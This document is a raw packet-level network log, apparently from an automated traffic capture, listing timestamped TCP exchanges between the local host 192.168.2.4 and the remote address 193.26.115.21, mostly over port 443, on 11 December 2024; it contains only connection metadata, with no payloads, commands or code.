Dec 11, 2024 18:03:16.547785044 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.547800064 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.547856092 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.552588940 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.553703070 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.553750992 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.553792000 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.553805113 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.553961039 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.554267883 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.601272106 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.601337910 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.601373911 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.601386070 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.601454020 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.601454973 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.711990118 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.712044001 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.712141037 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.712141037 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.712156057 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.712209940 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.717286110 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.717335939 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.717376947 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.717390060 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.717416048 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.717781067 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.723345041 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.723397017 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.723448038 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.723465919 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.723571062 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.723571062 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.729489088 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.729536057 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.729577065 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.729595900 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.729754925 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.729991913 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.734863043 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.734915018 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.734983921 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.734983921 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.734993935 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.735472918 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.740178108 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.740226030 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.740266085 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.740292072 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.740407944 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.740418911 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.746572018 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.746614933 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.746654034 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.746674061 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.746726990 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.746815920 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.794140100 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.794207096 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.794276953 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.794276953 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.794294119 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.794395924 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.907845974 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.907906055 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.907947063 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.907963037 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.907998085 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.908310890 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.913683891 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.913733006 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.913808107 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.913816929 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.913985014 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.918939114 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.918993950 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.919037104 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.919037104 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.919047117 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.919075012 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.920164108 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.924901962 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.924946070 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.925014019 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.925021887 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.925052881 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.930381060 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.930699110 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.930752039 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.930814981 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.930823088 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.930846930 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.936306000 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.936355114 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.936395884 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.936395884 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.936407089 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.937434912 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.939337015 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.942390919 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.942435026 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.942620039 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.942632914 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.943340063 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.946671963 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.987366915 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.987396955 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.987464905 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.987464905 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:16.987478971 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:16.987751007 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.101623058 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.101649046 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.101794004 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.101819992 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.102339983 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.107516050 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.107538939 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.107611895 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.107611895 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.107620955 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.107705116 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.112617970 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.112638950 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.112723112 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.112723112 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.112732887 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.113245010 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.117064953 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.117091894 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.117235899 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.117259026 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.118804932 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.123106956 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.123137951 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.123226881 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.123226881 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.123239994 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.123331070 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.128458023 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.128487110 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.128581047 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.128581047 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.128592968 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.132133961 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.134922981 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.134944916 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.135027885 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.135027885 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.135041952 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.135271072 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.290625095 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.290652990 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.290738106 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.290738106 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.290757895 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.290803909 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.295109034 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.295135975 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.295237064 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.295237064 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.295247078 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.295339108 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.301143885 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.301165104 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.301191092 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.301213026 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.301256895 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.301256895 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.306931019 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.306952953 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.307028055 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.307028055 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.307037115 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.307077885 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.312988043 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.313009977 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.313081980 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.313081980 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.313091040 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.313206911 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.318696022 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.318722963 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.318764925 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.318784952 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.318823099 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.318823099 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.323734045 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.323764086 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.323797941 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.323817015 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.323853016 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.323853970 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.329660892 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.329684019 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.329719067 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.329736948 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.329776049 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.329776049 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.420270920 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.483047009 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.483083963 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.483175993 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.483175993 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.483190060 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.483247995 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.487412930 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.487438917 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.487509012 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.487509012 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.487517118 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.487555027 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.493722916 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.493746042 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.493937969 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.493946075 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.493983984 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.499253988 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.499284029 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.499341011 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.499360085 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.499370098 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.499596119 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.504498005 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.504518986 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.504589081 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.504589081 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.504597902 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.504653931 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.504786015 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.510420084 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.510443926 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.510504007 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.510504007 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.510512114 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.510595083 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.516052961 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.516074896 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.516151905 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.516151905 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.516160011 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.516228914 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.522016048 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.522037029 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.522118092 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.522118092 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.522126913 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.522425890 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.623301983 CET	80	49734	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.623402119 CET	49734	80	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.675232887 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.675265074 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.675340891 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.675362110 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.675386906 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.675396919 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.679573059 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.679600000 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.679657936 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.679666996 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.679688931 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.679714918 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.685503006 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.685523987 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.685589075 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.685589075 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.685597897 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.685998917 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.691368103 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.691392899 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.691456079 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.691456079 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.691466093 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.691811085 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.696604967 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.696626902 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.696686029 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.696693897 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.696717024 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.696751118 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.702657938 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.702680111 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.702735901 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.702744961 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.702764988 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.702778101 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.708180904 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.708210945 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.708276033 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.708276033 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.708285093 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.708353043 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.714018106 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.714040995 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.714076996 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.714101076 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.714114904 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.714195013 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.817112923 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.866873980 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.866904020 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.866939068 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.866966009 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.866976976 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.867013931 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.881294966 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.881318092 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.881356001 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.881372929 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.881416082 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.881416082 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.881849051 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.881874084 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.881944895 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.881944895 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.881952047 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.881985903 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.885889053 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.885910034 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.885993958 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.885993958 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.886002064 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.886501074 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.889513016 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.889533997 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.889621019 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.889635086 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.889910936 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.895179033 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.895200968 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.895277977 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.895277977 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.895284891 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.895335913 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.900660038 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.900686979 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.900727987 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:17.900744915 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:17.900784016 CET	49735	443	192.168.2.4	193.26.115.21
